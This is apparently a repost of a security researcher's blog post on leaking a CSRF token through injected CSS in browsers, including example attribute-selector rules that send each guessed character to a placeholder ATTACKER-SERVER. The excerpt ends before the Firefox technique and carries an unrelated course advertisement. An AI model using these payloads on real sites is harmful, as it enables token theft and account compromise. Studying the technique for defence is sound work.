Original link: https://research.securitum.com/css-data-exfiltration-in-firefox-via-single-injection-point/

A few months ago I identified a security issue in Firefox known as CVE-2019-17016. During analysis of the issue, I’ve come up with a new technique of CSS data exfiltration in Firefox via a single injection point which I’m going to share in this blog post.

Basics and prior art

For the sake of the examples, we assume that we want to leak CSRF token from <input> element.

<input type="hidden" name="csrftoken" value="SOME_VALUE">

We cannot use scripts (perhaps because of CSP), so we need to settle for style injection. The classic way is to use attribute selectors, for instance:

input[name='csrftoken'][value^='a'] {
  background: url(//ATTACKER-SERVER/leak/a);
}

input[name='csrftoken'][value^='b'] {  
  background: url(//ATTACKER-SERVER/leak/b); 
}

input[name='csrftoken'][value^='z'] {  
  background: url(//ATTACKER-SERVER/leak/z); 
}

If the CSS rule is applied, then the attacker gets an HTTP request, leaking the first character of the token. Then, another stylesheet needs to be prepared that includes the first known character, for instance:

input[name='csrftoken'][value^='aa'] {
  background: url(//ATTACKER-SERVER/leak/aa); 
} 

input[name='csrftoken'][value^='ab'] {  
  background: url(//ATTACKER-SERVER/leak/ab); 
}

input[name='csrftoken'][value^='az'] {  
  background: url(//ATTACKER-SERVER/leak/az); 
}

It was usually assumed that subsequent stylesheets need to be provided via reloading the page that is loaded in an <iframe>.

In 2018 Pepe Vila had an amazing concept that we can achieve the same in Chrome with a single injection point by abusing CSS recursive imports. The same trick was rediscovered in 2019 by Nathanial Lattimer (aka @d0nutptr), however with a slight variation. I’ll summarize Lattimer’s approach below because it is closer to what I’ve come up with in Firefox, even though (what’s pretty funny) I wasn’t aware of Lattimer’s research when doing my own one. So one can say that I rediscovered a rediscovery…

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课